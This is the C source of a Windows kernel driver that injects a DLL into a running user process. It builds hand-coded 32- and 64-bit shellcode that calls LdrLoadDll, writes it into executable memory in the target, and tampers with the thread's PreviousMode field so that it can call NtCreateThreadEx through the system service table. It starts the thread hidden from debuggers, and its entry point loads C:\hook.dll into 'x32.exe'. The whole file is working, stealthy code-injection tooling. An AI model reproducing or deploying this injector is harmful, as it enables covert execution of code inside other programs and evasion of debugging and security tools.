#include "lyshark.h"
PINJECT_BUFFER GetNative64Code(IN PVOID LdrLoadDll, IN PUNICODE_STRING DllFullPath) { NTSTATUS Status = STATUS_SUCCESS; PINJECT_BUFFER InjectBuffer = NULL; SIZE_T Size = PAGE_SIZE;
UCHAR Code[] = { 0x48, 0x83, 0xEC, 0x28, 0x48, 0x31, 0xC9, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0x49, 0xB9, 0, 0, 0, 0, 0, 0, 0, 0, 0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF, 0xD0, 0x48, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, 0xC7, 0x02, 0x7E, 0x1E, 0x37, 0xC0, 0x48, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, 0x89, 0x02, 0x48, 0x83, 0xC4, 0x28, 0xC3 };
Status = ZwAllocateVirtualMemory(ZwCurrentProcess(), &InjectBuffer, 0, &Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (NT_SUCCESS(Status)) { PUNICODE_STRING UserPath = &InjectBuffer->Path64; UserPath->Length = 0; UserPath->MaximumLength = sizeof(InjectBuffer->Buffer); UserPath->Buffer = InjectBuffer->Buffer;
RtlUnicodeStringCopy(UserPath, DllFullPath);
memcpy(InjectBuffer, Code, sizeof(Code));
*(ULONGLONG*)((PUCHAR)InjectBuffer + 12) = (ULONGLONG)UserPath; *(ULONGLONG*)((PUCHAR)InjectBuffer + 22) = (ULONGLONG)&InjectBuffer->ModuleHandle; *(ULONGLONG*)((PUCHAR)InjectBuffer + 32) = (ULONGLONG)LdrLoadDll; *(ULONGLONG*)((PUCHAR)InjectBuffer + 44) = (ULONGLONG)&InjectBuffer->Complete; *(ULONGLONG*)((PUCHAR)InjectBuffer + 60) = (ULONGLONG)&InjectBuffer->Status;
return InjectBuffer; }
UNREFERENCED_PARAMETER(DllFullPath); return NULL; }
PINJECT_BUFFER GetNative32Code(IN PVOID LdrLoadDll, IN PUNICODE_STRING DllFullPath) { NTSTATUS Status = STATUS_SUCCESS; PINJECT_BUFFER InjectBuffer = NULL; SIZE_T Size = PAGE_SIZE;
UCHAR Code[] = { 0x68, 0, 0, 0, 0, 0x68, 0, 0, 0, 0, 0x6A, 0, 0x6A, 0, 0xE8, 0, 0, 0, 0, 0xBA, 0, 0, 0, 0, 0xC7, 0x02, 0x7E, 0x1E, 0x37, 0xC0, 0xBA, 0, 0, 0, 0, 0x89, 0x02, 0xC2, 0x04, 0x00 };
Status = ZwAllocateVirtualMemory(ZwCurrentProcess(), &InjectBuffer, 0, &Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (NT_SUCCESS(Status)) { PUNICODE_STRING32 pUserPath = &InjectBuffer->Path32; pUserPath->Length = DllFullPath->Length; pUserPath->MaximumLength = DllFullPath->MaximumLength; pUserPath->Buffer = (ULONG)(ULONG_PTR)InjectBuffer->Buffer;
memcpy((PVOID)pUserPath->Buffer, DllFullPath->Buffer, DllFullPath->Length);
memcpy(InjectBuffer, Code, sizeof(Code));
*(ULONG*)((PUCHAR)InjectBuffer + 1) = (ULONG)(ULONG_PTR)&InjectBuffer->ModuleHandle; *(ULONG*)((PUCHAR)InjectBuffer + 6) = (ULONG)(ULONG_PTR)pUserPath; *(ULONG*)((PUCHAR)InjectBuffer + 15) = (ULONG)((ULONG_PTR)LdrLoadDll - ((ULONG_PTR)InjectBuffer + 15) - 5 + 1); *(ULONG*)((PUCHAR)InjectBuffer + 20) = (ULONG)(ULONG_PTR)&InjectBuffer->Complete; *(ULONG*)((PUCHAR)InjectBuffer + 31) = (ULONG)(ULONG_PTR)&InjectBuffer->Status;
return InjectBuffer; }
UNREFERENCED_PARAMETER(DllFullPath); return NULL; }
NTSTATUS NTAPI SeCreateThreadEx(OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID StartAddress, IN PVOID Parameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, IN PNT_PROC_THREAD_ATTRIBUTE_LIST AttributeList) { NTSTATUS Status = STATUS_SUCCESS;
LPFN_NTCREATETHREADEX NtCreateThreadEx = (LPFN_NTCREATETHREADEX)(GetSSDTFuncCurAddr(GetIndexByName((UCHAR *)"NtCreateThreadEx"))); DbgPrint("线程函数地址: %p --> 开始执行地址: %p \n", NtCreateThreadEx, StartAddress);
if (NtCreateThreadEx) {
PUCHAR pPrevMode = (PUCHAR)PsGetCurrentThread() + 0x232;
UCHAR prevMode = *pPrevMode;
*pPrevMode = KernelMode;
Status = NtCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle, StartAddress, Parameter, Flags, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, AttributeList);
*pPrevMode = prevMode; } else { Status = STATUS_NOT_FOUND; } return Status; }
NTSTATUS ExecuteInNewThread(IN PVOID BaseAddress, IN PVOID Parameter, IN ULONG Flags, IN BOOLEAN Wait, OUT PNTSTATUS ExitStatus) { HANDLE ThreadHandle = NULL; OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
NTSTATUS Status = SeCreateThreadEx(&ThreadHandle, THREAD_QUERY_LIMITED_INFORMATION, &ObjectAttributes, ZwCurrentProcess(), BaseAddress, Parameter, Flags, 0, 0x1000, 0x100000, NULL); if (NT_SUCCESS(Status) && Wait != FALSE) { LARGE_INTEGER Timeout = { 0 }; Timeout.QuadPart = -(60ll * 10 * 1000 * 1000);
Status = ZwWaitForSingleObject(ThreadHandle, TRUE, &Timeout); if (NT_SUCCESS(Status)) { THREAD_BASIC_INFORMATION ThreadBasicInfo = { 0 }; ULONG ReturnLength = 0;
Status = ZwQueryInformationThread(ThreadHandle, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), &ReturnLength);
if (NT_SUCCESS(Status) && ExitStatus) { *ExitStatus = ThreadBasicInfo.ExitStatus; } else if (!NT_SUCCESS(Status)) { DbgPrint("%s: ZwQueryInformationThread failed with status 0x%X\n", __FUNCTION__, Status); } } else { DbgPrint("%s: ZwWaitForSingleObject failed with status 0x%X\n", __FUNCTION__, Status); } } else { DbgPrint("%s: ZwCreateThreadEx failed with status 0x%X\n", __FUNCTION__, Status); }
if (ThreadHandle) { ZwClose(ThreadHandle); } return Status; }
NTSTATUS AttachAndInjectProcess(IN HANDLE ProcessID, PWCHAR DllPath) { PEPROCESS EProcess = NULL; KAPC_STATE ApcState; NTSTATUS Status = STATUS_SUCCESS;
if (ProcessID == NULL) { Status = STATUS_UNSUCCESSFUL; return Status; }
Status = PsLookupProcessByProcessId(ProcessID, &EProcess); if (Status != STATUS_SUCCESS) { return Status; }
BOOLEAN IsWow64 = (PsGetProcessWow64Process(EProcess) != NULL) ? TRUE : FALSE;
KeStackAttachProcess((PRKPROCESS)EProcess, &ApcState); __try { PVOID NtdllAddress = NULL; PVOID LdrLoadDll = NULL; UNICODE_STRING NtdllUnicodeString = { 0 }; UNICODE_STRING DllFullPath = { 0 };
RtlInitUnicodeString(&NtdllUnicodeString, L"Ntdll.dll"); NtdllAddress = GetUserModuleAddress(EProcess, &NtdllUnicodeString, IsWow64); if (!NtdllAddress) { Status = STATUS_NOT_FOUND; }
if (NT_SUCCESS(Status)) { LdrLoadDll = GetModuleExportAddress(NtdllAddress, "LdrLoadDll", EProcess); if (!LdrLoadDll) { Status = STATUS_NOT_FOUND; } }
PINJECT_BUFFER InjectBuffer = NULL; if (IsWow64) { RtlInitUnicodeString(&DllFullPath, DllPath); InjectBuffer = GetNative32Code(LdrLoadDll, &DllFullPath); DbgPrint("[*] 注入32位DLL \n"); } else { RtlInitUnicodeString(&DllFullPath, DllPath); InjectBuffer = GetNative64Code(LdrLoadDll, &DllFullPath); DbgPrint("[*] 注入64位DLL \n"); }
ExecuteInNewThread(InjectBuffer, NULL, THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER, TRUE, &Status); if (!NT_SUCCESS(Status)) { DbgPrint("ExecuteInNewThread Failed\n"); } } __except (EXCEPTION_EXECUTE_HANDLER) { Status = STATUS_UNSUCCESSFUL; } KeUnstackDetachProcess(&ApcState); ObDereferenceObject(EProcess); return Status; }
VOID Unload(PDRIVER_OBJECT pDriverObj) { DbgPrint("[-] 驱动卸载 \n"); }
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegPath) { DbgPrint("Hello LyShark \n");
KeServiceDescriptorTable = (PSYSTEM_SERVICE_TABLE)GetKeServiceDescriptorTable64(DriverObject);
HANDLE processid = GetProcessID("x32.exe"); DbgPrint("进程PID = %d \n", processid);
AttachAndInjectProcess(processid, L"C:\\hook.dll");
DriverObject->DriverUnload = Unload; return STATUS_SUCCESS; }
|